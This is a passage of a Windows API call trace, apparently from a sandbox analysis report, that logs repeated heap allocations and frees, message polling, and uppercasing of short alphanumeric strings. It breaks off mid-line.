RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.071] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0166.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.072] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.072] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0166.072] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0166.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0166.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.073] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.073] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0166.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.073] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.073] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0166.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.074] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.074] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.074] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0166.074] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0166.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0166.075] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.075] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.076] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.076] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0166.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.076] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.077] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.077] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0166.077] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0166.077] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0166.077] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.078] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.078] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.078] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.078] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.078] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.079] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.079] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0166.079] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.080] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0166.080] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0166.080] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0166.080] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0166.080] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.080] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0166.081] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa328 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0166.081] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00c0 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.081] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0166.081] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0166.082] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, 